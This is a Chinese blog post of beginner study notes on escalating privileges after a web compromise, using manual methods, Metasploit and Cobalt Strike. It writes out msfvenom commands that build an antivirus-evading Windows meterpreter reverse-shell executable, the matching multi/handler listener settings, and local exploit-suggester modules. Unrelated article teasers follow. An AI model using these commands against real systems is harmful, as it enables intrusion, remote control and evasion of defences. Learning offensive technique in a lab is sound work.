web权限到系统权限 内网学习第一天 权限提升 使用手工还是cs???msf可以不??

现在开始学习内网的相关的知识了,我们在拿下web权限过后,我们要看自己拿下的是什么权限,可能是普通的用户权限,这个连添加用户都不可以,这个时候我们就要进行权限提升操作了。

权限提升这点与我们后门进行内网渗透是乘上启下的,没有权限进行什么的操作都比较难进行。

手工进行权限提升

他的话就比较的慢,而且在网上找到的exp可能是用不了的,因为你的真实环境与作者写的exp的话是有差距的,很容易失败。所以在手工方面我个人是不怎么建议的,但是你要了解手工是怎么进行权限提升的。

使用msf进行权限提升:

我们打开msf工具,我们要制作后门文件,因为我们以及拿下web权限了,我们可以上传文件的操作,使用msf制作后门文件的代码我的是这样:我试过一些没有成功。我的命令是这样的

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.199.129 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/test1.exe

第一个是我以前运行不了的命令,我不知道为什么就是没有后门程序出来

然后下面这个是可以运行的

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.163.131 LPORT=2222 -f exe > 222.exe  

我们在进行操作的时候我们先要理解参数的含义:下面我们来看看

-e 免杀的编码(msf自带的编码器)  
-b
 
去除坏字符对我们payload的操作
-o导出位置和名称
-p使用什么来进行来连接
-i迭代的次数
-f生成的格式

 参数大概就是这样我们下面来看看具体的操作,我们先使用msf工具生成后门程序然后在进行上传的操作。

我选择了222.exe文件然后在到上传的地方执行这个文件。

我们在执行的时候要使用msf工具开启监听功能:

下面是设置监听状态的   可以看看语雀的系统权限提升的那点来进行的操作     
监听完了过后要切换出来使用background使用这个命令来进行操作   use post/multi/recon/local_exploit_suggester  自动化的模块
要注意设置会话就是监听的时候你的会话参数   set session 多少这点要对应
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.163.131
set LPORT 2222
exploit

我们在配置监听的时候要与你创建的后门程序要与之对应的操作,我们然后在进行使用这个程序。

在kali中我们可以看见有主机上线了

 然后我们在进行测试操作

然后我们在进行权限提升。

我们先来看看半自动化的模块的操作:

先要切换出来,要不然会出问题的。

use post/windows/gather/enum_patches这个模块就是半自动模块

这点得到了exp文件跟我们手工是差不多的,我们还是直接使用全自动模块

要设置会话,前面的都是要设置会话的,会话就是你开始监听看见上线的session 数字

到这点就等他完成,然后你在进行使用相应的模块来进行权限提升

最后一步经常会出现创建会话失败的提示,你在看看是不是你配置的问题。

我这点也是没有成功的,可能是这个漏洞没有成功。没有成功我也不知道为什么。

大概的流程就是这样,我们使用msf工具来进行提权就是这样的。

cs工具来进行提权操作

cs是图形化的更加的好操作:我们先下载了谢公子的cs插件

我们先是在本地进行测试的。也是先配置了cs的团队服务器,然后进行启动。

我这里是启动了然后测试了的,我们先来到当前文件的sever这个文件下面有teamsever这个文件

我们然后在进行连接的操作,也就是配置

然后进入窗口,进行操作。

先改一下会话,让我们输入的命令可以更快的执行。

这点就可以进行相对应的权限提示操作。这里面的功能非常的强大,我们在进行后面的内网渗透的使用还要抓取里面的密码等等的操作,后期会经常使用cs这个工具

可以使用工具来进行权限提升的操作,还可以使用工具来进行内网的信息收集。

我在后面学习的时候会在来说说这个工具的,现在就说到这里。这个工具很强大!!!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/864918.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

C#编程命名笔记

1.变量名的命名规则->要求用“匈牙利法则” 变量类型特征位数命名规则例子bool 用b开头bUpdatesbyte有符号8位用sby开头sbyTypebyte无符号8位用by开头byTypeshort有符号16位用n开头nStepCountushort无符号16位用un开头unCountint有符号32位用i开头iCountuint(WO…

MySQL:设计数据库与操作

设计数据库 1. 数据建模1.1 概念模型1.2 逻辑模型1.3 实体模型主键外键外键约束 2. 标准化2.1 第一范式2.2 链接表2.3 第二范式2.4 第三范式 3. 数据库模型修改3.1 模型的正向工程3.2 同步数据库模型3.3 模型的逆向工程3.4 实际应用建议 4. 数据库实体模型4.1 创建和删除数据库…

Linux 磁盘空间清理

1.检查磁盘使用情况 #显示每个挂载点的磁盘使用量,以及可用空间和使用率 df -h #显示当前目录的全部文件和目录(包括隐藏的),以MB显示 ll -h 2. du查看最大的目录或文件 #逐级检查某个目录下各个子目录的大小。从根目录开始,逐级…

Linux_应用篇(25) SPI 应用编程基础

SPI基础知识 SPI(Serial Peripheral Interface,串行外设接口)是一种同步串行通信协议,广泛应用于微控制器和各种外围设备之间的数据传输。它由摩托罗拉公司在20世纪80年代开发,具有高速、全双工通信的特点&#xff0c…

基于x86+FPGA+AI轴承缺陷视觉检测系统,摇枕弹簧智能检测系统

一、承缺陷视觉检测系统 应用场景 轴类零件自动检测设备,集光、机、软件、硬件,智能图像处理等先进技术于一体,利用轮廓特征匹配,目标与定位,区域选取,边缘提取,模糊运算等算法实现人工智能高…

PCL 点云聚类(基于体素连通性)

文章目录 一、简介二、实现代码三、实现效果参考资料一、简介 这里的思路很简单,我们通过将点云转换为体素,基于体素的连通性实现对点云的聚类(有点类似于欧式聚类),不过这种方式进行的聚类有些粗糙,但聚类速度相对会快很多,具体的实现效果可以详细阅读代码。 二、实现代…

[AIGC] Java HashMap原理解析:深入探索键值对存储和检索的内部机制

HashMap是Java中最常用的数据结构之一,它提供了高效的键值对存储和检索能力。本文将深入探索Java HashMap的内部机制,详细介绍其原理和工作流程。 文章目录 一、HashMap的数据结构二、哈希冲突处理三、哈希算法四、键值对的存储和检索五、扩容和负载因子…

提高候选人的招聘感受:成功的策略

大约78%的候选人表示,他们的整体应聘体验表明企业对员工的关注。然而,超过一半的候选人透露,他们在招聘过程中有过负面的候选人经历,80%的候选人在经历了令人失望的招聘过程后会公开与他人分享他们的不良经历。 但也有一线希望&am…

Perl的上下文之谜:深入理解上下文概念

🕷️ Perl的上下文之谜:深入理解上下文概念 Perl,这门被誉为“只需一条命令就能完成任务”的编程语言,以其强大的文本处理能力而闻名。在Perl中,上下文是一个核心概念,它决定了变量的解释方式以及操作符的…

在nginx中设置相对路径跳转的方式

在nginx中的location中,设置301或302的跳转的方式一般是这样的 # 302跳转 location ~ ^/old/$ {return 302 /new/; }# 301跳转 location ~ ^/old/$ {return 301 /new/; }这里/new/虽然写的是相对路径,但是nginx依然会补齐url的前缀,这样在…

某某市信息科技学业水平测试软件打开加载失败逆向分析(笔记)

引言:笔者在工作过程中,用户上报某某市信息科技学业水平测试软件在云电脑上打开初始化的情况下出现了加载和绑定机器失败的问题。一般情况下,在实体机上用户进行登录后,用户的账号信息跟主机的机器码进行绑定然后保存到配置文件&a…

Echarts-散点图

1.案例1 1.1代码 option = {xAxis: {scale: true,splitLine: {show: false},axisLabel: {show: true,textStyle: {color: white, //更改坐标轴文字颜色}}},yAxis: {show:false,scale: true,splitLine: {show: true,lineStyle: {type: dashed,}},axisLabel: {show: true ,tex…

毛概客观题题库

第一章毛泽东思想及其历史地位 一、单选题 2.1917年( )的胜利开辟了世界无产阶级社会主义革命的新时代,也给中国送来了马克思列宁主义.... A.俄国十月革命 B.五四运动 C.中国共产党建立 D.中华人民共和国建立 4.标志着毛泽东思想开始萌…

第十四届蓝桥杯省赛C++B组E题【接龙数列】题解(AC)

需求分析 题目要求最少删掉多少个数后,使得数列变为接龙数列。 相当于题目要求求出数组中的最长接龙子序列。 题目分析 对于一个数能不能放到接龙数列中,只关系到这个数的第一位和最后一位,所以我们可以先对数组进行预处理,将…

C++初学者指南-3.自定义类型(第一部分)-析构函数

C初学者指南-3.自定义类型(第一部分)-析构函数 文章目录 C初学者指南-3.自定义类型(第一部分)-析构函数特殊的成员函数用户定义的构造函数和析构函数RAII示例:资源处理示例:RAII记录零规则 特殊的成员函数 T::T()默认构造函数当创建新的 T 对象时运行。…

电脑录音方法:电脑怎么录音?5招轻松搞定录音!

想要从麦克风或系统音频录制电脑声音吗?这是一项简单的任务。本文将为您介绍5种最佳且最简单的方法,包括使用Windows系统自带的录音工具来录制电脑音频,在线音频录音软件和专业的第三方电脑录音软件。这些工具都能够很好地帮助您完成电脑怎么…

在树莓派上安装中文输入法

在树莓派上安装中文输入法,可以使用 fcitx 输入法框架,它支持多种中文输入法,如拼音、五笔等。以下是详细步骤: 1. 更新系统 首先,确保你的系统是最新的: sudo apt update sudo apt upgrade2. 安装 fcit…

江苏高防IP对网络安全有何作用?

网络科技在快速发展的过程中,网络安全问题也日益增加,许多网站行业和服务器会受到DDOS攻击和CC攻击等多种恶意的网络攻击,这些攻击给企业带来了巨大的经济损失,同时也导致服务器出现瘫痪和网站无法正常运行的情况,为了…

一款十六进制编辑器,你的瑞士军刀!!【送源码】

软件介绍 ImHex是一款功能强大的十六进制编辑器,专为逆向工程师、程序员以及夜间工作的用户设计。它不仅提供了基础的二进制数据编辑功能,还集成了一系列高级特性,使其成为分析和修改二进制文件的理想工具。 功能特点 专为逆向工程、编程和夜…

verilog实现PID控制

1 原理讲解 距离上一次说PID算法的事情过去蛮久了,今天又重新看了看PID的代码,其实还是存在一些不合理的地方。 整理归纳了一下原理,位置式和增量式的变化。 2 工程实现 timescale 1ns / 1psmodule pid_controller(input clk,input r…